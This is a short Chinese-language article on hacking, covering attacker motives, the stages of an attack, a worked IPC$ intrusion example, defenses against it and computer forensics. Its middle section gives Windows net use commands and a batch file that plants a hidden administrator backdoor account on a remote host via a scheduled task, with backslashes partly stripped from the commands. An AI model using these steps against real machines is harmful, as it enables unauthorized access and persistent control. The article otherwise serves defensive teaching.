陈景佩

摘要：黑客是“Hacker”的音译，源于动词Hack，在美国麻省理工学院校园俚语中是“恶作剧”的意思，尤其是那些技术高明的恶作剧，确实，早期的计算机黑客个个都是编程高手。因此，“黑客”是人们对那些编程高手、迷恋计算机代码的程序设计人员的称谓。真正的黑客有自己独特的文化和精神，并不破坏其他人的系统，他们崇拜技术，对计算机系统的最大潜力进行智力上的自由探索。

关键词：Hacker；网络；防范1黑客攻击的动机

随着时间的变化，黑客攻击的动机不再像以前那样简单了：只是对编程感兴趣，或是为了发现系统漏洞。现在，黑客攻击的动机越来越多样化，主要有以下几种：⑴贪心。因为贪心而偷窃或者敲诈，有了这种动机，才引发许多金融案件。⑵恶作剧。计算机程序员搞的一些恶作剧，是黑客的老传统。⑶名声。有些人为显露其计算机经验与才智，以便证明自己的能力，获得名气。⑷报复/宿怨。解雇、受批评或者被降级的雇员，或者其他认为自己受到不公正待遇的人，为了报复而进行攻击。⑸无知/好奇。有些人拿到了一些攻击工具，因为好奇而使用，以至于破坏了信息还不知道。⑹仇恨。国家和民族原因。⑺间谍。政治和军事谍报工作。⑻商业。商业竞争，商业间谍。

2网络攻击的步骤

黑客技术是网络安全技术的一部分，主要是看用这些技术做什么，用来破坏其他人的系统就是黑客技术，用于安全维护就是网络安全技术。学习这些技术就是要对网络安全有更深的理解，从更深的层次提高网络安全。

进行网络攻击并不是件简单的事情，它是一项复杂及步骤性很强的工作。一般的攻擊都分为3个阶段，即攻击的准备阶段、攻击的实施阶段、攻击的善后阶段。

攻击的准备阶段

⑴在攻击的准备阶段重点做3件事情：确定攻击目的、收集目标信息以及准备攻击工具。①确定攻击目的：首先确定攻击希望达到的效果，这样才能做下一步工作。②收集目标信息：在获取了目标主机及其所在网络的类型后，还需进一步获取有关信息，如目标主机的IP地址、操作系统的类型和版本、系统管理人员的邮件地址等，根据这些信息进行分析，可以得到被攻击系统中可能存在的漏洞。③准备攻击工具：收集或编写适当的工具，并在操作系统分析的基础上，对工具进行评估，判断有哪些漏洞和区域没有覆盖到。

⑵以一个常见的网络入侵为例子

IPC$入侵方法

1)IPC$连接的建立与断开

①建立IPC$连接。假设192.168.1.104主机的用户名为abc，密码为123456，则输入以下命令。

net use \192.168.1.104IPC$ "123456"/user: "abc"

若要建立空连接，则输入以下命令。

net use \192.168.1.104IPC$ ""/user: ""

②建立网络驱动器，输入以下命令。

net use z: \192.168.1.104C$

若要删除网络驱动器，输入以下命令。

net use z: /delete

③断开IPC$连接。输入以下命令。

net use \192.168.1.104IPC$ /delete

2)建立后门账号

①编写批处理文件。在“记事本”中输入“net user sysback 123456 /add”和“net localgroup administrators sysback /add”命令，另存为hack.bat文件。②与目标主机建立IPC$连接。③复制文件到目标主机。输入“copy hack.bat \192.168.1.104C$”命令，把hack.bat文件复制到目标主机的C盘中。④通过计划任务使远程主机执行hack.bat文件，输入“net time \192.168.1.104”命令，查看目标系统时间。⑤假设目标系统的时间为22:30，则可输入“at \192.168.1.104 22:35 c:hack.bat”命令，计划任务添加完毕后，使用“net use * /delete”命令，断开IPC$连接。⑥验证账号是否成功建立。等一段时间后，估计远程主机已经执行了hack.bat文件。通过sysback账号建立IPC$连接。若连接成功，说明sysback后门账号已经成功建立。

3网络攻击的防范策略,以IPC$入侵的防范为例：

IPC$在为管理员提供了方便的同时，也留下了严重的安全隐患，防范IPC$入侵的方法有以下3种。

①删除默认共享。②禁止利用空连接进行用户名枚举攻击。在注册表中，把HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa中的restrictanonymous子键的值改为1。修改完毕后重新启动计算机，这样便禁止了利用空连接进行用户名枚举攻击(nbtstat–a IP)。不过要说明的是，这种方法并不能禁止建立空连接。③关闭Server服务。Server服务是IPC$和默认共享所依赖的服务，如果关闭Server服务，IPC$和默认共享便不存在，但同时服务器也丧失了其他一些服务，因此该方法只适合个人计算机使用。④屏蔽139、445端口。没有这两个端口的支持，是无法建立IPC$连接的，因此屏蔽139、445端口同样可以阻止IPC$入侵。

4网络入侵证据的收集与分析

从事网络安全工作的人都知道，黑客在入侵之后都会想方设法抹去自己在受害系统上的活动记录，目的是逃脱法律的制裁。而许多企业也不上报网络犯罪，其原因在于害怕这样做会对业务运作或企业商誉造成负面影响，他们担心这样做会让业务运作因此失序，更重要的是收集犯罪证据有一定困难。因此，CIO(Chief Information Office，首席信息官)们应该在应急响应系统的建立中加入计算机犯罪证据的收集与分析环节。

计算机取证又称为数字取证或电子取证，是指对计算机入侵、破坏、欺诈、攻击等犯罪行为利用计算机软硬件技术，按照符合法律规范的方式进行证据获取、保存、分析和出示的过程。从技术上，计算机取证是一个对受侵计算机系统进行扫描和破解，以及对整个入侵事件进行重建的过程。

4.1 计算机取证包括物理证据获取和信息发现两个阶段

物理证据获取是指调查人员到计算机犯罪或入侵的现场，寻找并扣留相关的计算机硬件；信息发现是指从原始数据(包括文件，日志等)中寻找可以用来证明或者反驳的证据，即电子证据。除了那些刚入门的“毛小子”之外，计算机犯罪分子也会在作案前周密部署、作案后消除蛛丝马迹。他们更改、删除目标主机中的日志文件，清理自己的工具软件，或利用反取证工具来破坏侦察人员的取证。

4.2 物理取证是核心任务

在任何情况下，调查者都应牢记以下5点：(1)不要改变原始记录。(2)不要在作为证据的计算机上执行无关的操作。(3)不要给犯罪者销毁证据的机会。(4)详细记录所有的取证活动。(5)妥善保存得到的物证。

[参考文献]

[1]陈忠平.《网络安全》.清华大学出版社,2011年.

[2]（美）格里格瑞斯,等,著.《网络安全：现状与展望》.科学出版社, 2010年.

[3]王淑江.《超级网管员网络安全》.机械工业出版社,2011年.